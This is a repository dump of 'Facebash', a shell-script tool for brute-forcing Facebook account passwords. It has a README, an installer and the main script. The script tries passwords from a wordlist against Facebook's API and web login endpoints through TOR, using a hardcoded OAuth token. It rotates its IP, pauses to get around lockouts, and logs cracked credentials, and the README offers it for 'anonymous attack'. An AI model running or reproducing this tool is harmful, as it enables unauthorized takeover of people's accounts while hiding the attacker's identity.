├── README.md
├── install.sh
└── facebash.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # Facebash v1.0
 2 | ## Author: github.com/thelinuxchoice
 3 | ## IG: @thelinuxchoice
 4 | Facebook Brute Forcer in shellscript using TOR
 5 | 
 6 | ### WARNING:
 7 | ```
 8 | Facebook blocks account for 1 hour after 20 wrong passwords, so this script can perform only 20 pass/h.
 9 | ```
10 | 
11 | ![facebash](https://user-images.githubusercontent.com/34893261/37884926-d3f1df94-3088-11e8-98c3-1513f22e627c.png)
12 | 
13 | ### Features
14 | 
15 | - Save/Resume sessions
16 | - Anonymous attack through TOR
17 | - Default Password List (+39k)
18 | 
19 | 
20 | ### Usage:
21 | 
22 | ```
23 | git clone https://github.com/thelinuxchoice/facebash
24 | cd instashell
25 | chmod +x facebash.sh
26 | service tor start
27 | sudo ./facebash.sh
28 | ```
29 | 
30 | ### Install requirements (Curl, Tor):
31 | 
32 | ```
33 | chmod +x install.sh
34 | sudo ./install.sh
35 | ```
36 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | #Author: github.com/thelinuxchoice
 3 | #Instagram: @thelinuxchoice
 4 | trap 'echo exiting cleanly...; exit 1;' SIGINT SIGTSTP
 5 | 
 6 | checkroot() {
 7 | 
 8 | if [[ "$(id -u)" -ne 0 ]]; then
 9 |    printf "\e[1;77mPlease, run this program as root!\n\e[0m"
10 |    exit 1
11 | fi
12 | 
13 | }
14 | 
15 | checkroot
16 | 
17 | (trap '' SIGINT SIGTSTP && command -v tor > /dev/null 2>&1 || { printf >&2  "\e[1;92mInstalling TOR, please wait...\n\e[0m"; apt-get update > /dev/null && apt-get -y install tor > /dev/null || printf "\e[1;91mTor Not installed.\n\e[0m"; }) & wait $!
18 | 
19 | (trap '' SIGINT SIGTSTP && command -v curl > /dev/null 2>&1 || { printf >&2  "\e[1;92mInstalling cURL, please wait...\n\e[0m"; apt-get update > /dev/null && apt-get -y install curl > /dev/null || printf "\e[1;91mCurl Not installed.\n\e[0m"; }) & wait $!
20 | 
21 | printf "\e[1;92mAll Requires are installed!\n\e[0m"
22 | 
23 | 


--------------------------------------------------------------------------------
/facebash.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # Author: github.com/thelinuxchoice
  3 | # Instagram: @thelinuxchoice
  4 | trap 'store; exit 1;' 2
  5 | counter=0
  6 | counter2=20
  7 | start=0
  8 | end=20
  9 | turn=$((start+end))
 10 | startline=1
 11 | endline=1
 12 | sumstart=0
 13 | 
 14 | 
 15 | checkroot() {
 16 | if [[ "$(id -u)" -ne 0 ]]; then
 17 |     printf "\e[1;77mPlease, run this program as root!\n\e[0m"
 18 |     exit 1
 19 | fi
 20 | }
 21 | 
 22 | checktor() {
 23 | 
 24 | check=$(curl --socks5-hostname localhost:9050 -s https://www.google.com > /dev/null; echo $?)
 25 | 
 26 | if [[ "$check" -gt 0 ]]; then
 27 | printf "\e[1;91mPlease, check your TOR Connection! Just type \"tor\" or \"service tor start\"\n\e[0m"
 28 | exit 1
 29 | fi
 30 | 
 31 | }
 32 | 
 33 | 
 34 | dependencies() {
 35 | 
 36 | command -v tor > /dev/null 2>&1 || { echo >&2 "I require tor but it's not installed, run install.sh. Aborting."; exit 1; }
 37 | command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed, run install.sh Aborting."; exit 1; }
 38 | 
 39 | }
 40 | 
 41 | 
 42 | banner() {
 43 | 
 44 | printf "\e[1;34m    _  _    _____                   _                  _      \n\e[0m"
 45 | printf "\e[1;34m  _| || |_ |  ___|                 | |                | |     \n\e[0m"
 46 | printf "\e[1;34m |_  __  _|| |_   __ _   ___   ___ | |__    __ _  ___ | |__   \n\e[0m"
 47 | printf "\e[1;34m  _| || |_ |  _| / _\` | / __| / _ \|  _ \  / _\` |/ __||  _ \  \n\e[0m"
 48 | printf "\e[1;77m |_  __  _|| |  | (_| || (__ |  __/| |_) || (_| |\__ \| | | | \n\e[0m"
 49 | printf "\e[1;77m   |_||_|  \_|   \__,_| \___| \___||_.__/  \__,_||___/|_| |_| \n\e[0m"
 50 | printf "\n"
 51 | printf "\e[1;104m     Facebash v1.0, Coded by: thelinuxchoice (IG/Github)     \e[0m\n"
 52 | printf "\n"
 53 | printf "\e[1;41m                       -=[ WARNING ]=-                       \e[0m\n"
 54 | printf "\n\e[1;77mPlease, keep in mind that Facebook blocks the account for 1 h\n"
 55 | printf "after 20 wrong passwords.\n\n\e[0m"
 56 | 
 57 | }
 58 | USER_AGENT='Firefox'
 59 | 
 60 | function start() {
 61 | 
 62 | read -p $'\e[1;92mEmail account: \e[0m' EMAIL
 63 | default_wl_pass="passwords.lst"
 64 | read -p $'\e[1;92mPassword List (Hit Enter to default list): \e[0m' wl_pass
 65 | wl_pass="${wl_pass:-${default_wl_pass}}"
 66 | 
 67 | }
 68 | function changeip() {
 69 | 
 70 | killall -HUP tor
 71 | 
 72 | }
 73 | 
 74 | function store() {
 75 | 
 76 | if [[ -n "$PASS" ]]; then
 77 | printf "\e[1;91m [*] Waiting a second...\n\e[0m"
 78 | sleep 3
 79 | fi
 80 | default_session="Y"
 81 | printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" $EMAIL
 82 | read -p $'\e[1;77m? [Y/n]: \e[0m' session
 83 | session="${session:-${default_session}}"
 84 | if [[ "$session" == "Y" || "$session" == "y" || "$session" == "yes" || "$session" == "Yes" ]]; then
 85 | if [[ ! -d sessions ]]; then
 86 | mkdir sessions
 87 | fi
 88 | cum=$(grep -n "$PASS" "$wl_pass" | cut -d ":" -f1)
 89 | printf "EMAIL=\"%s\"\nPASS=\"%s\"\nwl_pass=\"%s\"\ncum=\"%s\"\ntoken=\"%s\"\n" $EMAIL $PASS $wl_pass $token $token > sessions/store.session.$EMAIL.$(date +"%FT%H%M")
 90 | printf "\e[1;77mSession saved.\e[0m\n"
 91 | printf "\e[1;92mUse ./facebash.sh --resume\n"
 92 | else
 93 | exit 1
 94 | fi
 95 | 
 96 | }
 97 | 
 98 | 
 99 | function bruteforcer() {
100 | 
101 | count_pass=$(wc -l $wl_pass | cut -d " " -f1)
102 | printf "\e[1;92mEmail account:\e[0m\e[1;77m %s\e[0m\n" $EMAIL
103 | printf "\e[1;92mWordlist:\e[0m\e[1;77m %s (%s)\e[0m\n" $wl_pass $count_pass
104 | printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
105 | }
106 | 
107 | 
108 | function method1() {
109 | 
110 | while [ $counter -lt $turn ]; do
111 | 
112 | IFS=$'\n'
113 | for PASS in $(sed -n ''$((startline+sumstart))','$endline'p' $wl_pass); do
114 | countpass=$(grep -n "$PASS" "$wl_pass" | cut -d ":" -f1)
115 | token=$(($counter+1))
116 | printf "\e[1;77mTrying pass (%s/%s)\e[0m: \"%s\"\n" $token $count_pass $PASS
117 | sleep 1
118 | {( trap '' SIGINT && check=$( curl --socks5 localhost:9050 -s 'https://b-api.facebook.com/method/auth.login' --user-agent "Firefox" -L -H "Authorization: OAuth 200424423651082|2a9918c6bcd75b94cefcbb5635c6ad16" -d "email=$EMAIL&password=$PASS" | grep -o "session_key\|account is temporarily unavailable" | uniq ); if [[ $check == "session_key" ]]; then printf "\e[1;92m \n  [*] Password Found: %s\n " $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.facebash ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.facebash \n\e[0m";  kill -1 $$ ; elif [[ $check == "account is temporarily unavailable" ]]; then printf "\e[1;92m \n [*] Password Found or false positive: %s\n [*] Flag can be false positive\n" $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ;  fi ) } & done; wait $!;
119 | let counter++
120 | let startline++
121 | let endline++
122 | changeip
123 | done
124 | 
125 | }
126 | 
127 | 
128 | function method2() {
129 | 
130 | rm -rf cookies*
131 | while [ $counter2 -lt $turn ]; do
132 | 
133 | IFS=$'\n'
134 | for PASS in $(sed -n ''$((startline+sumstart))','$endline'p' $wl_pass); do
135 | countpass=$(grep -n "$PASS" "$wl_pass" | cut -d ":" -f1)
136 | token=$(($counter2+1))
137 | COOKIES='cookies'$countpass''
138 | #printf "method 2 \n"
139 | printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $token $count_pass $PASS
140 | 
141 | {( trap '' SIGINT && curl -s -X GET --socks5-hostname localhost:9050 'https://www.facebook.com/home.php' --user-agent $USER_AGENT --cookie $COOKIES --cookie-jar $COOKIES --location > /dev/null && curl -s -X POST --socks5-hostname localhost:9050 'https://login.facebook.com/login.php'  --user-agent $USER_AGENT --data-urlencode "email=${EMAIL}" --data-urlencode "pass=${PASS}" --cookie $COOKIES --cookie-jar $COOKIES > /dev/null && var=$( curl -s -X GET --socks5-hostname localhost:9050 'https://www.facebook.com/home.php'  --user-agent $USER_AGENT --cookie $COOKIES --cookie-jar $COOKIES | grep -o "logoutMenu\|account is temporarily unavailable" | uniq ); if [[ $var == "logoutMenu" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n " $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.facebash ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; elif [[ $check == "account is temporarily unavailable" ]]; then printf "\e[1;92m \n [*] Password Found or false positive: %s\n [*] Flag can be false positive\n" $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; fi; ) } & done; wait $!;
142 | rm -rf cookies$countpass
143 | changeip
144 | let startline++
145 | let endline++
146 | let counter2++
147 | 
148 | done
149 | }
150 | 
151 | function resumemethod1() {
152 | counter1=1
153 | count_pass=$(wc -l $wl_pass | cut -d " " -f1)
154 | while [ $counter1 -lt $turn ]; do
155 | threads=1
156 | IFS=$'\n'
157 | for PASS in $(sed -n ''$token','$(($cum+1))'p' $wl_pass); do
158 | 
159 | #countpass=$(grep -n "$PASS" "$wl_pass" | cut -d ":" -f1)
160 | #childcount=$(($counter1))
161 | printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $token $count_pass $PASS
162 | let token++
163 | #sleep 1
164 | {( trap '' SIGINT && check=$( curl --socks5 localhost:9050 -s 'https://b-api.facebook.com/method/auth.login' --user-agent "Firefox" -L -H "Authorization: OAuth 200424423651082|2a9918c6bcd75b94cefcbb5635c6ad16" -d "email=$EMAIL&password=$PASS" | grep -o "session_key\|account is temporarily unavailable" | uniq ); if [[ $check == "session_key" ]]; then printf "\e[1;92m \n  [*] Password Found: %s\n " $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.facebash ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.facebash \n\e[0m";  kill -1 $$ ; elif [[ $check == "account is temporarily unavailable" ]]; then printf "\e[1;92m \n [*] Password Found or false positive: %s\n [*] Flag can be false positive\n" $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; fi ) } & done; wait $!;
165 | let counter1++
166 | let threads++
167 | let startline++
168 | let endline++
169 | #let countpass++
170 | let cum++
171 | changeip
172 | done
173 | 
174 | }
175 | 
176 | function resumemethod2() {
177 | rm -rf cookies*
178 | count_pass=$(wc -l $wl_pass | cut -d " " -f1)
179 | counter22=20
180 | while [ $counter22 -lt $turn ]; do
181 | 
182 | IFS=$'\n'
183 | for PASS in $(sed -n ''$token','$(($cum+1))'p' $wl_pass); do
184 | let countpass++
185 | 
186 | COOKIES='cookies'$countpass''
187 | #echo "method 2: \n"
188 | #childcount=$(($counter22))
189 | printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $token $count_pass $PASS
190 | 
191 | {( trap '' SIGINT && curl -s -X GET --socks5-hostname localhost:9050 'https://www.facebook.com/home.php' --user-agent $USER_AGENT --cookie $COOKIES --cookie-jar $COOKIES --location > /dev/null && curl -s -X POST --socks5-hostname localhost:9050 'https://login.facebook.com/login.php'  --user-agent $USER_AGENT --data-urlencode "email=${EMAIL}" --data-urlencode "pass=${PASS}" --cookie $COOKIES --cookie-jar $COOKIES > /dev/null && var=$( curl -s -X GET --socks5-hostname localhost:9050 'https://www.facebook.com/home.php'  --user-agent $USER_AGENT --cookie $COOKIES --cookie-jar $COOKIES | grep -o "logoutMenu\|account is temporarily unavailable" | uniq ); if [[ $var == "logoutMenu" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n " $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.facebash ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; elif [[ $check == "account is temporarily unavailable" ]]; then printf "\e[1;92m \n [*] Password Found or false positive: %s\n [*] Flag can be false positive\n" $PASS; printf "Username: %s, Password: %s\n" $EMAIL $PASS >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m";  kill -1 $$ ; fi; ) } & done; wait $!;
192 | rm -rf cookies$countpass
193 | changeip
194 | 
195 | let startline++
196 | let endline++
197 | let counter22++
198 | let token++
199 | let cum++
200 | done
201 | }
202 | 
203 | function resume() {
204 | 
205 | banner
206 | checkroot 
207 | checktor
208 | counter=1
209 | if [[ ! -d sessions ]]; then
210 | printf "\e[1;91m[*] No sessions\n\e[0m"
211 | exit 1
212 | fi
213 | printf "\e[1;92mFiles sessions:\n\e[0m"
214 | for list in $(ls sessions/store.session*); do
215 | IFS=$'\n'
216 | source $list
217 | printf "\e[1;92m%s \e[0m\e[1;77m: %s (\e[0m\e[1;92mwl:\e[0m\e[1;77m %s\e[0m\e[1;92m,\e[0m\e[1;92m lastpass:\e[0m\e[1;77m %s )\n\e[0m" "$counter" "$list" "$wl_pass" "$PASS"
218 | let counter++
219 | done
220 | read -p $'\e[1;92mChoose a session number: \e[0m' fileresume
221 | source $(ls sessions/store.session* | sed ''$fileresume'q;d')
222 | 
223 | printf "\e[1;92m[*] Resuming session for user:\e[0m \e[1;77m%s\e[0m\n" $user
224 | printf "\e[1;92m[*] Wordlist: \e[0m \e[1;77m%s\e[0m\n" $wl_pass
225 | printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
226 | 
227 | while [ true ]; do
228 | 
229 | resumemethod1
230 | #let turn+=20
231 | #method2
232 | hourdate=$(date +%H)
233 | dat=$(($hourdate + 1))
234 | mindate=$(date +%M:%S)
235 | printf "\e[1;91m[*] Waiting 1 hour, to return at:\e[0m\e[1;93m %s:%s\n\e[0m" $dat $mindate
236 | let turn+=20
237 | sleep 3600
238 | resumemethod2
239 | hourdate2=$(date +%H)
240 | dat2=$(($hourdate2 + 1))
241 | mindate2=$(date +%M:%S)
242 | printf "\e[1;91m[*] Waiting 1 hour, to return at:\e[0m\e[1;93m %s:%s\n\e[0m" $dat2 $mindate2
243 | let turn+=20
244 | sleep 3600
245 | done
246 | 
247 | }
248 | 
249 | case "$1" in --resume) resume ;; *)
250 | 
251 | banner
252 | checkroot
253 | dependencies
254 | checktor
255 | start
256 | bruteforcer
257 | while [ true ]; do
258 | 
259 | method1
260 | #let turn+=20
261 | #method2
262 | hourdate=$(date +%H)
263 | dat=$(($hourdate + 1))
264 | mindate=$(date +%M:%S)
265 | printf "\e[1;91m[*] Waiting 1 hour, to return at:\e[0m\e[1;93m %s:%s\n\e[0m" $dat $mindate
266 | let turn+=20
267 | sleep 3600
268 | method2
269 | hourdate2=$(date +%H)
270 | dat2=$(($hourdate2 + 1))
271 | mindate2=$(date +%M:%S)
272 | printf "\e[1;91m[*] Waiting 1 hour, to return at:\e[0m\e[1;93m %s:%s\n\e[0m" $dat2 $mindate2
273 | let turn+=20
274 | sleep 3600
275 | done
276 | 
277 | esac
278 | 


--------------------------------------------------------------------------------